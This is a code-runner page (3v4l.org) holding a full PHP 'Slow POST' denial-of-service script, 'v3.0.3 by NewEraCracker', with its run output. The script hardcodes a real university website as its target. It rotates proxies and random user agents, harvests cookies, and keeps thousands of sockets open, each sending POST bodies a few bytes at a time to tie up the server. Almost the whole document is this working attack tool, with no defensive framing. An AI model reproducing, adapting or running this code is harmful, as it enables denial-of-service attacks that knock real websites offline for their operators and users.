3v4l.org

run code in 300+ PHP versions simultaneously
<?php set_time_limit(0); ignore_user_abort(true); $_SERVER['argv'][1] = 'http://www.estesl.ipl.pt/procurar/%rand%'; //------------------------- // CONFiG //------------------------- $CONFIG['max_cookies'] = 20; $CONFIG['max_sockets'] = 9001; $CONFIG['timeout_ms'] = 500; $CONFIG['usleep_time'] = 10; //------------------------- // INiT //------------------------- // Check SAPI if(PHP_SAPI != 'cli') { exitWithError('This script is not meant to be ran via browser.'); } // Check PHP Version if(version_compare(PHP_VERSION, '5.0.4') < 0) { exitWithError('This script only supports PHP 5.0.4 and higher.'); } // Define exploit version if(!defined('EXPLOIT_VERSION')) { define('EXPLOIT_VERSION', 'v3.0.3'); } // Define input stream if(!defined('STDIN')) { define('STDIN', fopen('php://stdin', 'r')); } // Globals - DO NOT EDIT $global_proxy_array = array(); //------------------------- // FUNCTIONS //------------------------- /** Read STDIN and return it */ function readSTDIN($message) { echo PHP_EOL.$message.' : '; return trim(fgets(STDIN)); } /** Exit with error message */ function exitWithError($message) { echo '[ERROR] '.$message; exit(1); } /** Receive a filename that has proxies listed in it and fills the $global_proxy_array */ function proxyLoadFile($filename) { global $global_proxy_array; // Load proxy list file $filename = str_replace('\\', '/', $filename); $content = @file_get_contents($filename); if(!$content) { exitWithError($filename.' is not a valid proxy-list file!'); } $content = str_replace(array("\r\n", "\r"), "\n", $content); $content = explode("\n", $content); // Grab the proxies foreach($content as $value) { $tmp = explode(':', $value); if(isset($tmp[0], $tmp[1])) { $tmp[0] = trim($tmp[0]); $tmp[1] = (int)(trim($tmp[1])); $global_proxy_array[] = array('host' => $tmp[0], 'port' => $tmp[1]); } } } /** Returns a random a proxy */ function proxyGetRandom() { global $global_proxy_array; $proxy = false; if(count($global_proxy_array)) { while(!$proxy) { $rand = mt_rand(0, count($global_proxy_array) - 1); $proxy = (isset($global_proxy_array[$rand]) ? $global_proxy_array[$rand] : null); } } return $proxy; } /** Returns a random useragent */ function randomUserAgent() { // Random Windows version $os = array('5.1', '5.2', '6.0', '6.1', '6.2'); $os = $os[mt_rand(0, count($os) - 1)]; // Select a random browser if(mt_rand(0, 1)) { // Random Internet Explorer version $ua[0] = array('4.0', '8.0', '4.0'); $ua[1] = array('5.0', '9.0', '5.0'); $ua[2] = array('5.0', '10.0', '6.0'); $ua = $ua[mt_rand(0, count($ua) - 1)]; return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[2]})"; } else { // Random Mozilla Firefox version $ua = mt_rand(17, 21); return "Mozilla/5.0 (Windows NT {$os}; rv:{$ua}.0) Gecko/20100101 Firefox/{$ua}.0"; } } /** Build stream context or header for connection */ function buildStreamContext($newEraUrl, $newEraProxy, $method='GET', $length='0', $cookie='', $just_header=false) { // Proxy support $proxy = $newEraProxy ? $newEraProxy->full_url : ''; $fulluri = ($newEraProxy && !$newEraUrl->ssl) ? true : false; // Prepare for header build $header = ''; // When we return header, set the GET/POST line if($just_header) $header .= $method.' '.($fulluri ? $newEraUrl->full_url : $newEraUrl->path).' HTTP/1.1'."\r\n"; // Continue building the header $header .= 'Host: '.$newEraUrl->name."\r\n"; $header .= 'Connection: Keep-Alive'."\r\n"; $header .= 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n"; $header .= 'User-Agent: '.randomUserAgent()."\r\n"; $header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n"; $header .= 'Accept-Encoding: gzip,deflate'."\r\n"; $header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n"; if($method == 'POST') { $header .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n"; $header .= mt_rand(0, 1) ? 'Referer: '.$newEraUrl->full_url."\r\n" : ''; $header .= ($cookie ? "Cookie: {$cookie}\r\n" : ''); $header .= "Content-Length: {$length}\r\n"; } // When we return header, return it with an extra EOL for termination if($just_header) return $header."\r\n"; // Build stream context $context = stream_context_create(array( 'http' => array( 'method' => $method, 'timeout' => (2), 'header' => $header, 'proxy' => $proxy, 'request_fulluri' => $fulluri, 'max_redirects' => (0), 'protocol_version' => (1.1), 'ignore_errors' => true ), 'ssl' => array( 'verify_peer' => false ))); return $context; } /** Start slowPost */ function slowPostStart($newEraUrl, $newEraProxy, $cookie) { global $CONFIG; $obj = ($newEraProxy ? $newEraProxy : $newEraUrl); $host = ($obj->ssl ? 'ssl://' : 'tcp://').$obj->name; // Connect if($socket = @fsockopen($host, $obj->port, $errno, $errstr, 2)) { // Generate random Content-Length $length = mt_rand(1337, 133700); if($newEraProxy && $newEraUrl->ssl) { // We must enable crypto when using a proxy and url with ssl $header = 'CONNECT '.$newEraUrl->name.':'.$newEraUrl->port."\r\n"; $header .= 'Host: '.$newEraUrl->name.':'.$newEraUrl->port."\r\n"; $header .= 'Proxy-Connection: Keep-Alive'."\r\n\r\n"; @fwrite($socket, $header); do { $s = trim(@fread($socket, 8192)); } while($s); @stream_socket_enable_crypto($socket, true, STREAM_CRYPTO_METHOD_SSLv3_CLIENT); } // Send header if(@fwrite($socket, buildStreamContext($newEraUrl, $newEraProxy, 'POST', $length, $cookie, true))) { // Set the socket to be asynchronous stream_set_blocking($socket, 0); stream_set_timeout($socket, 0, $CONFIG['timeout_ms']); // Return socket and the length remaining return array('socket' => $socket, 'length' => $length); } } return false; } /** Continue slowPost */ function slowPostContinue($socket, $bytes = 5) { global $CONFIG; // Check socket if(!$socket) return false; // Check bytes if(intval($bytes) != $bytes) $bytes = 5; // Throttle execution speed slightly if($CONFIG['usleep_time'] > 0) @usleep($CONFIG['usleep_time']); // Do it $tmp = ''; for($j = 0; $j < $bytes; $j++) $tmp .= chr(mt_rand(ord('a'), ord('z'))); return @fwrite($socket, $tmp); } //------------------------- // CLASSES //------------------------- /** I want cookies! Give me cookies! */ class NewEraCookies { private $max_cookies; private $cookies = array(); /** Constructor */ public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) { $this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output); } /** Object updater */ public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) { $this->max_cookies = $max_cookies; $this->cookies = array(); if($output) echo PHP_EOL.'BUILDING COOKIES '; for($i = 0; $i < $this->max_cookies; $i++) { // Using Proxy file? if($proxyFile) { $newproxy = proxyGetRandom(); if(!$newproxy) { exitWithError($proxyFile.' is not a valid proxy-list file!'); } $newEraProxy->update_object($newproxy['host'].':'.$newproxy['port']); } $this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy); if($output) echo '.'; } } /** Returns a cookie by its index */ public function returnCookieByIndex($idx) { if($idx == 'random') $idx = mt_rand(0, $this->max_cookies - 1); if(isset($this->cookies[$idx])) return $this->cookies[$idx]; return ''; } /** Function to parse set-cookie from header fields */ public static function cookieParse($header) { $cookies = array(); foreach($header as $line) { if(preg_match('/^Set-Cookie: /i', $line)) { $line = preg_replace('/^Set-Cookie: /i', '', trim($line)); $csplit = explode(';', $line); $cdata = array(); $grabbed_cookie_data = false; foreach($csplit as $data) { $cinfo = explode('=', $data); $cinfo[0] = trim($cinfo[0]); if(!$grabbed_cookie_data) { $cdata['value']['key'] = $cinfo[0]; $cdata['value']['value'] = $cinfo[1]; $grabbed_cookie_data = true; continue; } $cinfo[0] = strtolower($cinfo[0]); if($cinfo[0] == 'expires') $cinfo[1] = @strtotime($cinfo[1]); if($cinfo[0] == 'secure') $cinfo[1] = 'true'; if(in_array($cinfo[0], array('domain', 'expires', 'path', 'secure', 'comment'))) { $cdata[$cinfo[0]] = $cinfo[1]; } } $cookies[] = $cdata; } } return $cookies; } /** Function to build the request cookie header from parsed set-cookie data */ public static function cookieBuild($data) { if(is_array($data)) { $cookie = array(); foreach($data as $d) $cookie[] = $d['value']['key'].'='.$d['value']['value']; if(count($cookie) > 0) return trim(implode('; ', $cookie)); } return false; } /** Function to grab cookies from an url using PHP's fopen */ public static function cookieGrab($newEraUrl, $newEraProxy = null) { $cookie = ''; $handle = @fopen($newEraUrl->full_url, 'r', false, buildStreamContext($newEraUrl, $newEraProxy, 'GET')); // I hope this does work if($handle) { // Grab the cookies $metadata = stream_get_meta_data($handle); $cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data'])); @fclose($handle); } return $cookie; } } /** Class to construct and handle an url-like object */ class NewEraUrl { private $host_full_url; private $host_protocol; private $host_ssl; private $host_name; private $host_port; private $host_path; /** Constructor */ public function __construct($url) { $this->update_object($url); } /** Object updater */ public function update_object($url) { $this->host_full_url = $url; // URL: SSL and protocol $this->host_ssl = (strpos($url, 'https') === 0) ? true : false; $this->host_protocol = ($this->host_ssl ? 'https' : 'http'); $url = explode('/', $url, 4); $url[2] = explode(':', $url[2], 2); // URL: Name, port and path $this->host_name = $url[2][0]; $this->host_port = (isset($url[2][1]) ? $url[2][1] : ($this->host_ssl ? 443 : 80)); $this->host_path = '/'.(isset($url[3]) ? $url[3] : ''); } /** Getter for the private properties */ public function __get($var) { $var = 'host_'.$var; if(isset($this->{$var})) { // Random support $str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $str = substr(str_shuffle($str), 0, 8); // Return string with random generated content return str_replace('%rand%', $str, $this->{$var}); } } /** Quick check to see if url is minimally valid */ public static function isValid($url) { if(strpos($url, 'https://') === 0) { if(!extension_loaded('openssl')) { exitWithError('OpenSSL extension is not loaded - Unable to access HTTPS URL'); } return true; } else if(strpos($url, 'http://') === 0) { return true; } return false; } } /** Class to construct and handle a proxy-like object */ class NewEraProxy { private $proxy_full_url; private $proxy_name; private $proxy_port; /** Constructor */ public function __construct($url) { $this->update_object($url); } /** Object updater */ public function update_object($url) { if(FALSE !== ($tmp = strpos($url, '://'))) { $tmp += 3; $url = substr($url, $tmp); } $url = explode(':', $url); // Proxy: Name, port and full URL $this->proxy_name = $url[0]; $this->proxy_port = (int)(isset($url[1]) ? $url[1] : '8080'); $this->proxy_full_url = 'tcp://'.$this->proxy_name.':'.$this->proxy_port; } /** Getter for the private properties */ public function __get($var) { $var = 'proxy_'.$var; if(isset($this->{$var})) return $this->{$var}; } } //------------------------- // MAiN CODE FOR THE LULZ //------------------------- echo " _______. __ ______ ____ __ ____ / || | / __ \ \ \ / \ / / | (----`| | | | | | \ \/ \/ / \ \ | | | | | | \ / .----) | | `----.| `--' | \ /\ / |_______/ |_______| \______/ \__/ \__/ .______ ______ _______.___________. | _ \ / __ \ / | | | |_) | | | | | | (----`---| |----` | ___/ | | | | \ \ | | | | | `--' | .----) | | | | _| \______/ |_______/ |__| "; echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL; // Fetch the URL to attack $url = null; if(isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1])) $url = $_SERVER['argv'][1]; // Fetch proxy to use $proxy = array(); if(!empty($url) && isset($_SERVER['argv'][2])) { if($proxy = explode(':', $_SERVER['argv'][2])) { if(isset($proxy[0], $proxy[1])) { $proxy['file'] = false; $proxy['host'] = $proxy[0]; $proxy['port'] = (int)($proxy[1]); unset($proxy[0], $proxy[1]); } } if(!(isset($proxy['host'], $proxy['port'])) && is_readable($_SERVER['argv'][2])) { $proxy['file'] = true; $proxy['filename'] = $_SERVER['argv'][2]; } } // Ask for proxy if((empty($proxy['host']) || empty($proxy['port'])) && empty($url) && empty($proxy['file'])) { do { switch($tmp = substr(strtolower(readSTDIN('Do you want to use a proxy [yes/no/file]')), 0, 1)) { case 'n': break; case 'y': $proxy['host'] = readSTDIN('Proxy IP'); $proxy['port'] = (int)(readSTDIN('Proxy port')); break; case 'f': $proxy['filename'] = readSTDIN('Proxy file'); if(is_readable($proxy['filename'])) { $proxy['file'] = true; } else { echo PHP_EOL.'Invalid file!'.PHP_EOL; $tmp = null; } break; default: $tmp = null; echo PHP_EOL.'Invalid choice!'.PHP_EOL; break; } } while(!$tmp); } // Ask for target URL while(!$url) { $url = readSTDIN('Target url'); if(NewEraUrl::isValid($url)) break; $url = null; echo PHP_EOL.'Invalid target!'.PHP_EOL; } // Init proxy support if(empty($proxy['host']) || empty($proxy['port'])) { $newEraProxy = null; if(!empty($proxy['file'])) { proxyLoadFile($proxy['filename']); $newproxy = proxyGetRandom(); if(!$newproxy) { exitWithError($proxy['filename'].' is not a valid proxy-list file!'); } $newEraProxy = new NewEraProxy($newproxy['host'].':'.$newproxy['port']); } } else { $newEraProxy = new NewEraProxy($proxy['host'].':'.$proxy['port']); } // Init the others $newEraUrl = new NewEraUrl($url); $newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $CONFIG['max_cookies'], @$proxy['file'], true); // Start echo PHP_EOL.'IMMA FIRIN MAH LAZOR '; $fp = array(); // Do it while(1) { for($i = 0; $i < $CONFIG['max_sockets']; $i++) { // Using Proxy file? if(!empty($proxy['file'])) { $newproxy = proxyGetRandom(); if(!$newproxy) { exitWithError($proxy['filename'].' is not a valid proxy-list file!'); } $newEraProxy->update_object($newproxy['host'].':'.$newproxy['port']); } // Open a new socket if($tmp = slowPostStart($newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random'))) { // Progress bar echo '.'; if(isset($fp[$i], $fp[$i]['socket'])) { // Close connection in the global socket array if it's being used @fclose($fp[$i]['socket']); unset($fp[$i]); } // Save the new socket in the global socket array $fp[$i] = $tmp; } // Check the current slowPosts foreach($fp as $k => $v) { if($fp[$k]['socket'] && ($fp[$k]['length'] > 0)) { // Contine current $tmp = ($fp[$k]['length'] < 5) ? $fp[$k]['length'] : 5; slowPostContinue($fp[$k]['socket'], $tmp); $fp[$k]['length'] -= $tmp; } else { // Close completed @fclose($fp[$k]['socket']); unset($fp[$k]); } } } } ?>
Output for 5.6.38, 7.1.22, 7.2.10 - 7.2.33, 7.3.16 - 7.3.33, 7.4.3 - 7.4.33, 8.0.0 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.6
_______. __ ______ ____ __ ____ / || | / __ \ \ \ / \ / / | (----`| | | | | | \ \/ \/ / \ \ | | | | | | \ / .----) | | `----.| `--' | \ /\ / |_______/ |_______| \______/ \__/ \__/ .______ ______ _______.___________. | _ \ / __ \ / | | | |_) | | | | | | (----`---| |----` | ___/ | | | | \ \ | | | | | `--' | .----) | | | | _| \______/ |_______/ |__| v3.0.3 by NewEraCracker BUILDING COOKIES .................... IMMA FIRIN MAH LAZOR
Process exited with code 137.
preferences:
143.33 ms | 404 KiB | 143 Q